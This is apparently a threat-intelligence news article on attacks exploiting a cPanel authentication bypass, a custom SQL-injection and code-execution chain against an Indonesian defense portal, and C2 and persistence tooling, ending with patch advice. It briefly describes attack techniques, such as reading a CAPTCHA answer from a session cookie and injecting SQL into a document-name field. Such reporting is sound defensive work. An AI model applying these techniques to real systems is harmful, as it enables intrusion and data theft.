## cPanel Authentication Bypass Exploited in Targeted Attacks Researchers at **Ctrl-Alt-Intel** detected on May 2, 2026, a campaign abusing **CVE-2026-41940**, a critical authentication bypass vulnerability in **cPanel** and WebHost Manager (WHM). This flaw allows remote attackers to gain elevated control of the control panel.  The attacks originate from IP address `95.111.250[.]175` and primarily target government and military domains associated with the Philippines (`*.mil.ph` and `*.ph`) and Laos (`*.gov.la`), alongside MSPs and hosting providers. Threat actors are using publicly available proof-of-concepts (PoCs) found on GitHub to exploit the vulnerability. ## Indonesian Defense Portal Targeted with Custom Exploit Chain Prior to the **cPanel** attacks, the threat actor employed a separate custom exploit chain targeting an Indonesian defense sector training portal. This involved a combination of authenticated SQL injection and remote code execution, indicating the attacker already possessed valid credentials. "The script uses hard-coded credentials and defeats the portal's CAPTCHA by reading the expected CAPTCHA value out of the server-issued session cookie rather than solving the challenge normally," **Ctrl-Alt-Intel** stated. "Once authenticated and passing the CAPTCHA, the actor moves to a document-management function. The vulnerable parameter is the field used to save a document name, and the script injects SQL into that field when posting to the document-save endpoint."  ## AdaptixC2 Framework and Persistent Access Analysis reveals the threat actor utilizes the **AdaptixC2** command-and-control (C2) framework to remotely control compromised endpoints. Tools such as OpenVPN and Ligolo are also deployed to establish persistent access to internal victim networks. "The actor built a durable access layer using OpenVPN, Ligolo, systemd persistence, and then used that access to pivot into an internal network and exfiltrate a substantial corpus of Chinese railway-sector documents," **Ctrl-Alt-Intel** added. ## Widespread Exploitation and Mitigation The identity of the threat actor remains unknown. However, **Censys** reported evidence of multiple third parties weaponizing the **cPanel** vulnerability within 24 hours of its public disclosure, including the deployment of **Mirai** botnet variants and a ransomware strain called Sorry. According to the Shadowserver Foundation, approximately 44,000 IP addresses compromised via **CVE-2026-41940** were involved in scanning and brute-force attacks on April 30, 2026. This number has since decreased to 3,540 as of May 3, 2026. **cPanel** has released an updated detection script to reduce false positives. Users are strongly advised to apply the available patches immediately and follow recommended procedures to clean up affected environments if indicators of compromise (IoCs) are identified.